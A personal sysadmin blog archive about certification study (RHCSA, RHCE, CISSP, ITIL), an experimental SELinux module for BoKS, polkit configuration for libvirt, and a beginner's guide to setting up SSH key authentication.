Over the past years I've worked with many Unix systems and I've also worked with monitoring, deployment and security systems. However, I've never done any work with databases! And that's changed now that I'm in a scrum team that manages an application which runs on Websphere and Oracle. So here I go! I really want to know what I'm working with, instead of just picking up some random terms left and right. 

Starting in March, I'm studying Oracle 11. And to keep myself motivated I've set myself the goal of achieving basic Oracle certification, which in this case comes in the shape of the OCA (Oracle Certified Associate). The certification consists of two exams: a database technology part and an SQL part, the latter of which may be taken online.

This is going to be very challenging for me, as I've never been a good programmer. Learning SQL well enough to write the small programs associated with the exam is going to be exciting but hard :)

View or add comments (curr. 0)

Passed my RHCE

2014-11-11 09:16:00

Snoopy is happy

Huzzah! I passed, with a score of 260 out of 300... That makes it roughly 87%, which is an excellent ending to four months of hard prepwork.

The great thing is that I'm now able to rack up 85 CPE for my CISSP! 25 points in domain A and 60 points in domain B, which means that my CISSP renewal for this year and the next two is basically a shoo-in. Of course, I'll continue my training and studies :)

My RHCE experience was wonderful. Like last year with my RHCSA, I took the Red Hat Kiosk exam in Utrecht.

A while back I was contacted by Red Hat, to inform me that I'm a member of the Red Hat 100 Kiosk Club, which basically means that I'm one of the first hundred people in Europe to have taken a Kiosk exam. As thanks for this, they offered me my next Kiosk exam for free, which was yesterday's RHCE. Nice!

The exam was slated for 10:00, I showed up at 09:30. The reception at BCN in Utrecht was friendly, with free drinks and comfy seats to wait. The Kiosk setup was exactly as before, save the slot for my ID card which was already checked at the door. The keyboard provided was pretty loud, so I'm sorry to the other folks taking their exams in the room :)

All in all I came well prepared, also with thanks to my colleagues for sharing another trial exam with me.

View or add comments (curr. 0)

Let's do this!

2014-11-09 15:15:00

RHCE exam in 18 hours

If I'm not ready by now, nothing much will help :)

Looking forward to taking the RHCE exam tomorrow and whichever way it goes, I'm also looking forward to the SELinux course I'll be taking at IT Gilde tomorrow night.

View or add comments (curr. 0)

RHCE exams, here I come

2014-07-29 21:32:00

Yes, this blog has been quiet for quite a while. In part this is because I've put most of my private stuff behind logins, but also because I've had my professional development on the back burner due to my book translation. 

But now I've started studying for my RHCE certification. A year ago (has it been that long?!) I achieved my RHCSA, which I'll now follow up with the Engineer's degree. Red Hat will still offer the RHEL6 exams until the 19th of December, so I'd better get my ass in gear :)

View or add comments (curr. 0)

F.Lux on Linux: oh happy day!

2014-07-29 21:27:00

Oh happy day! I've been using F.Lux on my Macs for years now and my eyes thank me for it. This great piece of software will automatically adjust the color temperature of your computer's screen, based on your location and light in your surroundings. 

During the day your screen's white will be white, but in the evenings it'll slowly turn much more orange. During this change you won't even notice it's happening, but the end result is awesome. You'll still be seeing "white" but with much less eyestrain. Even better: supposedly the smaller amount of blue light will help in falling asleep later on. 

Now that I've started studying for my RHCE exams, I'm working extensively on CentOS again. Hellooooo bright light! 

But not anymore. Turns out that xflux is a thing! It's a Linux daemon that quite literally is F.Lux, for Linux. No more burnt out corneas!

View or add comments (curr. 0)

Running BoKS on SELinux protected servers

2013-10-01 09:00:00

I have moved the project files into GitHub, over here

FoxT Server Control (aka BoKS) is a product that has grown organically over the past two decades. Since its inception in the late nineties it has come to support many different platforms, including a few Linux versions. These days, most Linuxen support something called SELinux: Security-Enhanced Linux. To quote Wikipedia:

"Security-Enhanced Linux (SELinux) is a Linux kernel security module that provides the mechanism for supporting access control security policies, including United States Department of Defense-style mandatory access controls (MAC). It is a set of kernel modifications and user-space tools that can be added to various Linux distributions. Its architecture strives to separate enforcement of security decisions from the security policy itself and streamlines the volume of software charged with security policy enforcement."

Basically, SELinux allows you to very strictly define which files and resources can be accessed under which conditions. It also has a reputation of growing very complicated, very fast. Luckily there are resources like Dan Walsh' excellent blog and the presentation "SELinux for mere mortals".

Because BoKS is a rather complex piece of software, with dozens of binaries and daemons all working together across many different resources, integrating BoKS into SELinux is very difficult. Thus it hasn't been undertaken yet, and thus BoKS not only requires itself to be run outside of SELinux' control, it actually wants the software fully disabled. So basically you're disabling one security product so you can run another product that protects other parts of your network. Not so nice, no?

So I've decided to give it a shot! I'm making an SELinux ruleset that will allow the BoKS client software to operate fully, in order to protect a system alongside SELinux. BoKS replicas and master servers are even more complex, so hopefully those will follow later on. 

I've already made good progress, but there's a lot of work remaining to be done. For now I'm working on a trial-and-error basis, adding rules as they are needed. I'm foregoing the use of sealert for now, as I didn't like the rules it was suggesting. Sure, my method is slower, but at least we'll keep things tidy :)

Over the past few weeks I've been steadily expanding the boks.te file (TE = Type Enforcement, the actual rules):

v0.32 = 466 lines
v0.34 = 423 lines
v0.47 = 631 lines
v0.52 = 661 lines 
v0.60 = 722 lines 
v0.65 = 900+ lines 

Once I have a working version of the boks.te file for the BoKS client, I will post it here. Updates will also be posted on this page.


Update 01/10/2013:

Looks like I've got a nominally working version of the BoKS policy ready. The basic tests that I've been performing are working now, however, there's still plenty to do. For starters I'll try to get my hands on automated testing scripts, to run my test domain through its paces. BoKS needs to be triggered to just about every action it can, to ensure that the policy is complete.


Update 19/10/2013:

Now that I have an SELinux module that will allow BoKS to boot up and to run in a vanilla environment, I'm ready to show it to the world. Right now I've reached a point where I can no longer work on it by myself and I will need help. My dev and test environment is very limited, both in scale and capabilities and thus I can not test every single feature of BoKS with this module. 

I have already submitted the current version of the module to FoxT, to see what they think. They are also working on a suite of test scripts and tools, that will allow one to automatically run BoKS through its paces which will speed up testing tremendously. 

I would like to remind you that this SELinux module is an experiment and that it is made available as-is. It is absolutely not production-ready and should not be used to run BoKS systems in a live environment. While most of BoKS' basic functions have been tested and verified to work, there are still many features that I cannot test in my current dev environment. I am only running a vanilla BoKS domain. No LDAP servers, no Kerberos, no other fancy features. 

Most of the rules in this file were built by using the various SELinux troubleshooting tools, determining what access needs to be opened up. I've done it all manually, to ensure that we're not opening up too much. So yeah: trial and error. Lots of it. 

This code is made available under the Creative Commons - Attribution-ShareAlike license. See here for full details. You are free to Share (to copy, distribute and transmit the work), to Remix (to adapt the work) and to make commercial use of the work under the following conditions:

So. How to proceed? 

  1. Build a dev/test environment of your own. I'm running CentOS VMs using Parallels Desktop on my Macbook. Ensure that they're all up to date and that you include SELinux with the install. Better yet, check the requirements on this page
  2. I've got a BoKS master, replica and client, all version 6.7. However, installing BoKS on CentOS is a bit tricky and requires some workarounds.
  3. Download the BoKS SELinux module files
  4. Put them in a working directory, together with a copy of the Makefile from /usr/share/selinux/devel/
  5. Run: make. If you use the files from my download, it should compile without errors. 
  6. Run: semodule -i boks. The first time that you're building the policy you'll need to install the module (-i). After that, with each recompile you will need -u, for update. 
  7. Run: touch /.autorelabel. Then reboot. Your system will change all the BoKS files to their newly defined SELinux types. 
  8. Run: setenforce 1. Then get testing!  Start poking around BoKS and check /var/log/audit/audit.log for any AVC messages that say something's getting blocked. 

I'd love to discuss the workings of the module with you and would also very much appreciate working together with some other people to improve on all of this. 


Update 05/11/2014:

Henrik Skoog from Sweden contacted me to submit a bugfix. I'd forgotten to require one important thing in the boks.te file. That's been fixed. Thanks Henrik!


Update 11/11/2014:

I have moved the project files into GitHub, over here

View or add comments (curr. 0)

Installing CentOS Linux as default OS on a Macbook

2013-08-12 16:46:00

While preparing for my RHCSA exams, I was in dire need of a Linux playground. At first I could make do with virtual machines running inside Parallels Workstation on my Macbook. But in order to use Michael Jang's practice exams I really needed to run Linux as the main OS (the tests require KVM virtualization). I tried and I tried and I tried, but CentOS refused to boot, mostly ending up on the grey Tux / penguin screen of rEFIt.

On my final attempt I managed to get it running. I started off with this set of instructions, which got me most of the way. After resyncing the partition table using rEFIt's menu, using the rEFIt boot menu would still send me to the grey penguin screen. But then I found this page! It turns out that rEFIt is only needed in order to tell EFI about the Linux boot partition! Booting is then done using the normal Apple boot loader!

Just hold down the ALT button after powering up and then choose the disk labeled "Windows". And presto! It works: CentOS boots up just fine. You can simply set it as the default boot disk, provided that you left OS X on there as well (by using the Boot Disk Selector).

View or add comments (curr. 0)

RHCSA achieved

2013-08-12 16:23:00

Huzzah! As I'd hoped, I passed my RHCSA examination this morning. Not only is this a sign that I'm learning good things about Linux, but it also puts me 100% in the green for my continued CISSP-hood: 101 points in domain A and 62 in domain B: 163/120 required points.

I can't be very specific about the examination due to the NDAs, but I can tell a little bit about my personal experience. 

The testing center in Utrecht was pleasant. It's close to the highway and easily accessible because it's not in the middle of town. The amenities are modern and customer-friendly. The testing room itself is decent and the kiosk setup is exactly as shown in Red Hat videos. Personally, I am very happy that RH started with the kiosk exams because of the flexibility it offers. With this new method, you can sit for RHCSA/RHCE/etc almost every day, instead of being bound to a specific date. 

The kiosk exam comes with continuous, online proctoring, meaning that you're not stuck if something goes wrong. In a normal exam situation you'd be able to flag down a proctor, and in this case you can simply type in the chatbox to get help. And I did need it on two occasions, because something was broken on the RH side. The online support crew was very helpful and quick to react! They helped me out wonderfully!

I prepared for the test by using two of Michael Jang's books: the RHCSA/RHCE study guide and the RHCSA/RHCE practice exams. If you decide to get those books, I suggest you do NOT go for the e-books because the physical books include DVDs with practice materials. Without going into details of the exams, I found that Jang's books provided me ample preparation for the test. However, it certainly helps to do further investigation on your own, for those subjects that you're not yet familiar with.

View or add comments (curr. 0)

Security measures all of us can take - part 3

2013-08-10 22:53:00

Here's another follow-up with regards to security matters I believe everybody should know. It's a short one: Email is not safe.

It has been said that you "don't put anything in an email that you wouldn't want to see on the evening news." It's not even a matter of the NSA/FBI/KGB/superspies. Email really is akin to writing something on a postcard: it's legible to anyone who can get his hands on it. And like with the postal service, many people can get their hands on your email. 

Here is an excellent and long read on the many issues with email. But to sum it up:

  1. In general, emails are transferred and stored unencrypted. Anyone on the same network as you can read them in passing. Anyone managing an email server can read the mails stored on them.
  2. Source/sender information is easily spoofed. There is no way to guarantee that an email actually came from whoever's name is at the top. 

These two problems can be worked around in a few rather technical manners, most of which are not very user friendly. The most important one is to use GPG/PGP, which allows you to encrypt (problem 1) and to digitally sign (problem 2) the emails that you send. It certainly helps, but it introduces a new problem: key exchange. You now need to swap encryption keys with all people with whom you'll want to swap emails. But at least it's something. 

In the meantime:

Want to send me an encrypted email? Here's my public key :)

View or add comments (curr. 0)

An update on certifications

2013-08-07 22:09:00

Here's a follow-up post to last year's "Confessions of a CISSP slacker".

By the end of last year I was woefully behind on my CPE (continued professional education) requirements, which are needed to retain my CISSP certification. Not only is CISSP a darn hard exam to take, but ISC2 also needs you to garner a minimum of 120 study points every three years. In my first two years I didn't put in much effort, meaning I had a trickle of 51 points out of 120. Thus my emergency plan for making it to 120+ points in the span of a year.

All the calculations were made in the linked article and then I set things into motion. With my resolve strengthened by my personal coach, I put together a plan for 2013 that would ensure my success. And my hard work has been paying off, because as of tonight I have achieved the first milestone: the minimum of 80 points in "domain A" (screenshot above). 

The heaviest hitters in obtaining these 29 points are:

The remaining points were garnered by attending online seminars and by perusing a number of issues of InfoSecurity Professional magazine.

Next Monday I'm scheduled to take my RHCSA (Red Hat Certified System Administrator) exam. I've been working hard for the past three months and I'm confident that I'll pass the practical exam on my first go. If I do, that's a HUGE load of CPE, because all the study time counts towards my CISSP. That would be roughly 20 hours in domain A (security-related) and 60 hours in domain B (generic professional education). And that, my friend, would put me squarely over my minimal requirements! And I haven't even finished all the items on my wishlist :)

View or add comments (curr. 0)

KVM, libvirt, polkit-1 and remote management

2013-07-16 22:00:00

With Red Hat's default virtualization software KVM, it's possible to remotely manage the virtual machines running on a system. See here for some regular 'virt-ception'.

Out of the box, libvirt will NOT allow remote management of its VMs. If you would like to run a virt-manager connection through SSH, you will need to play around with Polkit-1. There is decent documentation available for the configuration of libvirt and Polkit-1, but I thought I'd provide the briefest of summaries.

Go into /etc/polkit-1/localauthority/50-local.d and create a file called (for example) 10.libvirt-remote.pkla. This file should contain the following entries:

[libvirt Remote Management Access]

This setup will allow anyone with (secondary) group "libvirt" to manage VMs remotely. That's a nice option to put into your standard build!
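The file body appears to have been lost from this archive; the stock polkit-1 local-authority rule for this setup (granting the org.libvirt.unix.manage action to the libvirt group) reads:

```ini
[libvirt Remote Management Access]
Identity=unix-group:libvirt
Action=org.libvirt.unix.manage
ResultAny=yes
ResultInactive=yes
ResultActive=yes
```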

View or add comments (curr. 0)

Virt-ception: we've got to go deeper

2013-04-11 20:45:00


I'm currently studying for my RHCSA certification. As part of the exam I will need to work with KVM virtual machines, which require a proper piece of hardware to run on.

Sadly I haven't been able to boot CentOS off a USB drive on my Macbook, despite numerous attempts. I've had a number of great tutorials, but no dice. Luckily my colleague Peter (not the one of the iMac) came to the rescue! He runs a sandbox system at home, which is a great playground to study for the RHCSA. He gave me an account and permissions to fiddle with KVM. 

Which is what landed me with the screenshot above. That's:

View or add comments (curr. 2)

Successes from coaching

2013-02-24 20:52:00

Keuzes Maken

For the past few months I've been undergoing personal coaching by Menno. Today we simply spoke about the successes I've booked over the past few weeks. All of them were brought on by actions I undertook based on the coaching I've been receiving. Each of the following was an 'action point' or 'todo' item from our sessions.

View or add comments (curr. 1)

Starting preparations for RHCSA

2013-02-21 22:31:00

Well, this is a first. Sometime soon, my Macbook will be booting another operating system than Mac OS X for the very first time in its life. Sure it's run Solaris, Fedora and Windows! But that was using Parallels virtual machines...

In order to prepare for the RHCSA certification I will need to learn about setting up virtual machines on a physical Linux box. And since we don't have the €200-€300 to buy a test box (which I'll only use for these two exams) I'm stuck using my primary laptop. That means I will be taking notes locally on Linux, which should be a cinch using the Evernote web interface.

I just hope that running CentOS on an external USB 2.0 drive hooked up to my 2008 laptop won't be too slow to work with :) tags: , ,

View or add comments (curr. 0)

ITILv3 certification achieved

2013-02-17 08:55:00

ITILv3 certificate

Right, that's out of the way!

In late December I made a plan for 2013, which would enable me to retain my CISSP certification while at the same time restoring my relevance to the IT job market. A few weeks later I got started on my ITILv3 studies, but those ground to a sudden halt when I chose an awful book to study from. A week later I started anew using the study guide by Gallacher and Morris, which is a great book!

A month after starting the Gallacher and Morris book I took my exam using the EXIN Anywhere online examination. I didn't want to spend time away from the office to take this simple exam, which is why I went for the online offering. I'm very glad EXIN are providing this service! I thought I'd share my experience with the EXIN Anywhere method here.

I also provided EXIN with two pieces of feedback after taking the exam.

  1. During the setup phase, you are allowed to re-take your photograph and to re-take the photograph of your ID card. However, there is no option available to restart the room inspection. During my room inspection, an error popped up from the proctoring software, suggesting that the filming might not have completed. No definitive answer was provided and there was no option to restart the filming of the workspace. I sincerely hope I won't be failed on the exam because of this.
  2. The exam format is rather unfriendly when compared to other computer-based exams. In essence it is simply a long HTML document with all the questions underneath each other. Other testing suites (though admittedly offline) put the questions in a much more user-friendly format: one question at a time, an option to mark questions for review, etc.

All in all I'm happy with how all of this went and it's certainly nice to have refreshed my ITIL knowledge. I last studied ITILv2 in 2001.

The fact that it took me a month to study for this test worries me a bit though. The total prep time for ITILv3 was 15 hours (translating into 15 CPE for my CISSP). I'm fairly certain that my RHCSA will easily take over 80 hours, which does not bode well. I reckon it might be somewhere between my LPIC and my CISSP studies when it comes to workload. If I want to achieve it within a reasonable timeframe, I will need to stick to a much stricter regime.

View or add comments (curr. 1)

Structures: solidifying goals and intentions

2013-02-10 11:54:00

My dou, with motto

One of the recurring themes in my coaching sessions with Rockover is "structures": things you put in place to act as reminders of something that you need to (or want to) change. I've talked about one of'm before. In order to solidify my new motto, I've given it the same treatment as the previous one that I took in: both adorn the inside of my dou, the torso armor worn in kendo.

Sure, my kanji look crappy, but they will serve their purpose: to remind me of what I want to achieve at the beginning of every training session, class and seminar.


That photograph reminds me: the Agyo omamori in my dou is officially way overdue on being returned to the shrine it came from. We bought it in Nara in October of 2011 (photo of the temple), meaning that we were supposed to return it three months ago. Since I'm not religious I don't believe I'm calling down any bad luck upon myself, but then again I do value tradition :) Maybe I should drop another email to the Dutch shinto shrine.

View or add comments (curr. 0)

A new motto for this year: katsubou

2013-01-29 21:20:00


Well! It's not every day that I get a mention on a 7th dan sensei's blog :D

My motto for 2012 was enryo (遠慮): "restraint". 

The motto has served me well and I will continue to be inspired by it. It still adorns my desk and it is on the inside of my dou. At the office I have become better at communicating and at sticking to boundaries and in kendo I have become less apt to rush in foolishly. 

For 2013 I will be adding a new motto, katsubou (渇望): "hunger, craving".

This motto comes through inspiration by four people whom I've come to respect very much. Donatella-sensei and Vitalis-sensei, after their instructions at the last Centrale Training. And Kris and Hillen-fukushou, based on their feedback to our recent kyu exams. Summarizing it: without stupidly rushing in (see above), I need to crave achieving yuko datotsu on my opponent. I need to hunger for "kills" and to show eagerness in all my undertakings. Only then will I be properly training and will I be able to show my current skill level in a shinsa.

Interestingly, this motto is also applicable professionally insofar that I'm working to retain my CISSP certification. I'd slacked off over the past two years, but now I'm working hard to make up for that. In order to achieve this plan fully, I need to be "hungry". I need to keep at it, working on each successive goal in order to reach the final destination.

It'll be an interesting year :)

View or add comments (curr. 0)

ITILv3: bone dry material

2013-01-13 20:31:00

Dry dry dry

*cough**hack* Someone get me a glass of water! 

After getting some quick credits out of the way for my CISSP certification, I'm now moving on to ITILv3 Foundations, all according to plan. But boy, oh boy, is that some dry reading material! When I first took my ITILv2 exam in 2001, it took some slogging and then I made the certification in one go. So technically you would expect me to get through this renewal easily. Well, I'm working through this particular book and it's drrryyyyyyyyaaaaihhh. A veritable deluge... no, that implies "wet"... A veritable landslide of management terms and words, rammed into short definitions, makes for something I have trouble getting through.

Maybe I'd better get another book :)

Pictures not mine, sources A and B.

View or add comments (curr. 0)

Coaching: better than I expected

2013-01-12 13:45:00

Quite a while ago my dear friend Menno started a career in personal coaching. He's still a civil engineer, but as a side business he runs Rockover Coaching which is based on the co-active coaching formula. It took a lot of hard work, but he's now ready to start working with clients. As part of his startup year, he asked me whether I'd like to be a 'victim' and I gladly accepted. I may have an ingrained mistrust of coaches, but I know I can trust the guy who's been my best friend for 27 years ;)

Over the past few weeks we've used a lot of different techniques to explore various topics.

So... After almost three months of weekly coaching I have to say it's a lot more fun and interesting than I thought before starting with Menno. I had a few other touchy-feely courses (through work) before this, but none of those were as comfortable as this.

View or add comments (curr. 1)

Study plan for 2013: continued education

2012-12-21 06:03:00

Because I like to keep work and my private life very much separated, I usually try to do as little IT stuff at home as possible. "Work is work, home is home", I often say and so far it's made for a pleasant balance between the two where I don't take home too much stress. But, as much as I dislike it, being in the IT workforce means there is a very real need for continued education. So every once in a while I will do a huge burst of studying in one go, to achieve a specific goal or two. Case in point: 2010's CISSP certification.

However, said CISSP certification means that I will now need to start using a different approach in my continued education. I can no longer work with infrequent bursts, as I need to obtain a certain amount of CPE credits every year. Which is why I broke out the proverbial calculator and did some math to determine what I should do on an annual basis to retain my CISSP. Instead of huge bursts of work, I will now be spreading out my studies.

Which is why I made the following plan for my 2012/2013 studies.


Again, with many thanks to my colleague Rob for making the final needed suggestion to get me to sort out the CPE calculation. And to my coach for being my sparring partner in all of this.

View or add comments (curr. 0)

SSH keys for dummies: how to set up ssh_pk authentication

2012-12-20 21:18:00

How to set up SSH keys in three easy steps

Creating and configuring SSH key authentication can be a complicated matter. Ask any techie, including myself, about the process and you are likely to get a very longwinded and technical explanation. I will in fact provide that exhaustive story below, but here's the short version, where you set up SSH key authentication in three easy steps.


Quickly setting up SSH key authentication

  1. Generate a new key pair using...

ssh-keygen -t rsa

...and just press Return on all questions.

  2. Install the "lock" on your door using...

ssh-copy-id -i ~/.ssh/id_rsa.pub $host

...where $host is your target system. Or, if ssh-copy-id is not available, use the manual instructions further down this page.

  3. You're done! Start enjoying your SSH connection!

ssh $host


Please feel free to print the poster of this three-step approach, just to make sure you don't forget the steps.


What is SSH anyway?

SSH, short for Secure SHell, is an encrypted communications protocol used between two computers. Both the login process and the actual data interchange are fully encrypted, ensuring that prying eyes don't get to see anything you are working on. It also becomes a lot harder to steal a user account, because simply grabbing the password as it passes over the network becomes nigh impossible.

The name, secure shell, hides the true potential of the SSH protocol as it allows for many more functions. Among others, SSH offers a secure alternative to old-fashioned (and unencrypted) protocols such as Telnet and FTP.

SSH is cross-platform, insofar that both server and client software is available for many different operating systems. Traditionally it is used to connect from any OS to a Unix/Linux server, but SSH servers now also exist for Microsoft Windows and other platforms.

SSH is capable of using many different authentication and authorization methods, depending on both the version of SSH that is being used and on the various provisions made by the host OS (such as PAM on a Unix system). One is not tied to using usernames and passwords, with certificates, smartcards, "SSH keys" (what this whole page is about) and other options also being available.

Unfortunately, its flexibility and its many (configuration) options can make using SSH seem like a very daunting task.


What are SSH keys?

The default authentication method for SSH is the familiar pair of username and password. Upon initiating an SSH session you are asked to provide your username first, then your password, after which SSH will verify the combination against what the operating system knows. If it's a match, you're allowed to log in. If not, you're given another chance or two and ultimately disconnected from the system. However, the need to enter two values manually is a burden when trying to automate various processes. It often leads to hackneyed solutions where usernames and passwords are stored in plaintext configuration files, which really defeats the purpose of using such a secure protocol.

SSH keys provide an alternative method of authenticating yourself upon login. Taken literally, an SSH keypair is two ASCII files, each containing a long string of seemingly random characters and numbers. These keys are nearly impossible to fake and they only work in pairs; one does not work without the other. The reason why SSH key authentication works is that what is encrypted using one key can only be decrypted using the other key. And vice versa. This is the principle behind what is known as public key cryptography.

Public key encryption, and thus SSH key authentication, is a horribly complex technical matter. I find that for most beginners it's best to use an analogy.

A keypair consists of two keys: the public and the private key. The public key could be said to be a lock that you install on an account/server, while the private key is the key to fit that lock. The key will fit no other lock in the world, and no other key will fit this particular lock.

Because of this, the private key must be closely guarded, protected at all cost. Only the true owner of the private key should have access to it. This private key file can be protected using a password of its own (to be entered whenever someone would like to use the key file), but it is often not. Unfortunately this means that, should someone get their hands on the private key file, the target account/host becomes forfeit. Thus it's better to use a password protected keyfile in combination with SSH-agent. But that's maybe a bit too advanced for now :)

The public key on the other hand can be freely copied and strewn about. It is only used to set up your access to an account/server, but not to actually provide it. The public key is used to authenticate your private key upon login: if the key fits the lock, you're in. "Losing" a public SSH key poses no security risk at all.

Of course there's one caveat: while losing a public key is not a problem, one should not simply add public keys onto any account! Doing so would enable access to this account/server for the accompanying private key. So you should only install public keys that have good reason for accessing a specific account.
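To audit what's already there, reasonably recent versions of OpenSSH's ssh-keygen can list every installed key. A hedged sketch (very old ssh-keygen versions may only report the first key in the file):

```shell
# List the fingerprint and comment of every public key that is allowed
# to open this account. Investigate any entry you don't recognize.
ssh-keygen -l -f ~/.ssh/authorized_keys
```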


How does SSH key authentication work?

So how does SSH key authentication work? It all relies on a public key infrastructure feature called "signing". The exact process of SSH key authentication is described in IETF RFC 4252, but the gist of it is as follows. 

  1. The source system "signs" a test message with your private key
  2. The destination system verifies that signature using your public key
  3. If the signature checks out, then we know that the pair of keys match. You're allowed to log in.

As I said, this only works because the public and private key have an unbreakable and inimitable bond.
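The same sign-and-verify principle can be demonstrated on the command line with OpenSSL. This is just an illustrative sketch (it assumes the openssl binary is available; the file names are made up for the example):

```shell
# Generate a throwaway RSA keypair: a private key and its public half.
openssl genrsa -out demo.key 2048 2>/dev/null
openssl rsa -in demo.key -pubout -out demo.pub 2>/dev/null

# Sign a message with the PRIVATE key...
echo "test message" > msg.txt
openssl dgst -sha256 -sign demo.key -out msg.sig msg.txt

# ...and verify the signature using only the PUBLIC key.
openssl dgst -sha256 -verify demo.pub -signature msg.sig msg.txt
```

The last command prints "Verified OK"; change a single byte in msg.txt or msg.sig and verification fails, which is exactly the property SSH relies on.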

All of the following text assumes that you already HAVE a ready-to-use SSH keypair. That's the first step in the three-step poster shown at the top of this page. Generating a keypair is done using the ssh-keygen command, which needs to be run as the account that will be using the keys. Basically: ssh-keygen -t rsa is all you need to run to generate the keypair. It will ask you for a passphrase (which can be left empty).


What if you don't have ssh-copy-id?

Unfortunately ssh-copy-id is not included with every SSH client, especially not if you're coming from Windows. The instructions below will only work when your source host is a Unix/Linux system, so if you're using Windows as a source you will definitely need to use the manual process. The script below also assumes that the remote host is running OpenSSH.

Copy and paste the script below into a terminal window on your source host. It will ask you to enter your password on the remote host once.


echo "Which host do we need to install the public key on?"
read HOST
ssh -q $HOST "umask 077; mkdir -p ~/.ssh; cat >> ~/.ssh/authorized_keys" < ~/.ssh/id_rsa.pub


This could fail if your public key file is named differently, for instance because you generated a different type of key, or because you are running a non-vanilla setup.

Setting up SSH keys the hard way

So, finally the hardest part of it all: getting SSH keys to work, without the use of ssh-copy-id or any other handy-dandy tooling. 

First up, there is the nasty fact that not all SSH clients and daemons were created equal. There are different standards that they can adhere to when it comes to key file types as well as the locations thereof. Because Linux and open source software have become so widespread, OpenSSH has become very popular as both client and server. But you'll also see F-Secure, Putty, Comforte, and a whole wad of others out there. 

To find out which Unix SSH client you're running, type: ssh -V

For example:

$ ssh -V
ssh: F-Secure SSH 5.0.3 on powerpc-ibm-aix5.3.0.0

$ ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8j 07 Jan 2009



Putty and WinSCP

When you are going to be communicating from one type of host to another (SSH2 vs OpenSSH), you will need to perform key file conversion using the ssh-keygen command. The following assumes that you are running the command on an OpenSSH host.
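A sketch of what such a conversion looks like with OpenSSH's ssh-keygen (the file names are made up for the example): -e exports an OpenSSH public key to the SSH2/RFC 4716 format used by F-Secure and friends, and -i imports one back.

```shell
# Create a throwaway keypair so this example is self-contained.
ssh-keygen -t rsa -N "" -f demokey -q

# Export the OpenSSH public key to SSH2 (RFC 4716) format...
ssh-keygen -e -f demokey.pub > demokey_ssh2.pub

# ...and convert an SSH2-format public key back to OpenSSH format.
ssh-keygen -i -f demokey_ssh2.pub > demokey_openssh.pub
```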

Key points to remember

Always make sure you are clear:

File permissions
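File permissions are indeed the classic stumbling block: sshd quietly refuses key authentication when the files involved are too permissive. A sketch of the usual safe modes, assuming default OpenSSH file names (adjust to your own setup):

```shell
chmod 700 ~/.ssh                  # the directory: owner-only
chmod 600 ~/.ssh/id_rsa           # private key: never readable by others
chmod 644 ~/.ssh/id_rsa.pub       # public key: world-readable is fine
chmod 600 ~/.ssh/authorized_keys  # the "locks" on this account
```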

View or add comments (curr. 0)

Confessions of a CISSP slacker

2012-12-09 10:30:00

And to think... At the end of 2010 I was ecstatic about achieving CISSP status, after weeks of studying and after a huge exam. I loved the studying and the pressure and of course the fact that I managed to snag a prestigious certificate on my first attempt.

Well, the graphic on the left is a variation of my celebratory image of the time. I'm sad to say that I've been slacking off for the past two years, only doing the bare essentials to retain said title. Why? My colleague Rob had it spot on: "It seems like such a huge, daunting task to maintain your CPE." But in retrospect it turns out that he's also right insofar that "it really isn't that much work!".

Let's do some math, ISC2 style!

In order to maintain your CISSP title, you need to earn a total of 120 CPE in three years' time. As an additional requirement, you must earn 20 CPE every single year, meaning that you can't cram all 120 credits into one year. To confuse things a little, ISC2 refer to group A and group B CPE (which basically differentiates between security work and other work).

Now, let's grab a few easily achieved tasks that can quickly earn at least the minimum required CPE.

That right there is 27 CPE per year, all in group A, which meets the required minimum. It's also 81 CPE out of the required 120 CPE for our three year term.

Of the 120 hours, a total of 40 can be achieved through group B, which involves studying other subjects besides IT security. In my case, the most obvious solution for this is self-study or classroom education for Unix-related subjects. In the next few months I will be studying for my RHCSA certification (and possibly my SCSA re-certification), which will easily get me the allowed 40 hours.

That means I only need to achieve 120 - (81+40) = -1 more CPE through alternative ways :) Additional CPE can be achieved through podcasts, webcasts or by visiting trade shows and seminars. One awesomely easy and interesting way is ISC2 web seminars, which can be followed both realtime and on recordings.
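For the record, a quick shell check of the arithmetic above (the numbers are the ones from this post):

```shell
yearly_group_a=27                       # easily earned group A CPE per year
term_group_a=$((yearly_group_a * 3))    # 81 CPE over the three-year term
group_b=40                              # maximum group B CPE allowed
echo $((120 - (term_group_a + group_b)))  # prints -1: nothing left to earn
```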

Now, because I've been slacking off the past two years, I will need to be smart about my studies and the registration thereof. I'm putting together a plan to both maintain my CISSP and to prepare for my RHCSA.

It's time to get serious. Again. ;)


It looks like it's a good idea to also renew my ITIL foundations certification. If I'm not mistaken, that can be counted towards group A of CPE, as ITIL is used in domains pertaining to life cycle management, to business continuity and to daily operations. I'll need to ask ISC2 to be sure.

Also, many thanks to Jeff Parker for writing a very useful article, pertaining specifically to my plight.

View or add comments (curr. 1)

Coactive coaching: DO-DONT structure

2012-11-05 07:35:00

dont bark do restrain yourself

Recently I started a coaching process with Rockover Coaching (about which I'll write more later). In our third fruitful session I was assigned a bit of homework: make a structure for use in the office, to remind me of some of my personal DOs and DONTs.

In this case the DONT is my at-times hyperactive approach in communicating: too fast, not letting people come to their conclusions, sticking my nose in and generally forcing an opinion. The DO is the polar opposite of this, which I have already set as goal for 2012: enryo, self-restraint, calmness and respect. The intention of the structure is to put something in place that inherently reminds me of these DOs and DONTs at any given time, so I chose to hang up a poster at my desk.

Looking for graphics that trigger the DO and DONT in my mind, the DO is obviously represented by the kanji for the word "enryo" (as discussed before). When it came to the DONT one thing immediately popped into my head: Dexter's Laboratory's talking dog. The overly excited, busybusy, shouty dog who yelps for attention exclaiming that "I FOUND THE THING! THE THING! I GOT THE THING!" Or that's how it went in Dutch; in English apparently it's "found you", but hey.

So... The above poster is what I whipped up in a few minutes and as per this blogpost it's delivered to my coach. There you go sir! ;)

View or add comments (curr. 3)

Exchanging blows with colleagues

2012-05-11 08:00:00

Misleading title FTW. /o/ For once I'm not writing about another colleague I pissed off :p

Yesterday was the annual field trip of my department at $CLIENT. After a last-minute change of plans due to the weather we all gathered at a far-away gymnasium to partake in an introductory class in fencing. Sabre fencing to be specific.

I enjoyed it, fencing's cool! :) If I weren't into kendo already, I would've probably picked up fencing especially because Almere has a rather large club. Reminds me of another company outing, which led to me trying a new sport.

Here are some observations based on my kendo experience:

View or add comments (curr. 0)

Learning from my mistakes

2012-03-30 11:13:00

The past month I've been paying more attention to my methods of communicating and of working, all under the motto of enryo: "restraint". Overall I see improvement, but with the help of colleagues I've also recognized a number of slipups. 

A while back I stated a number of targets for myself, after a big kerfuffle at the office. Here's how things have gone so far.

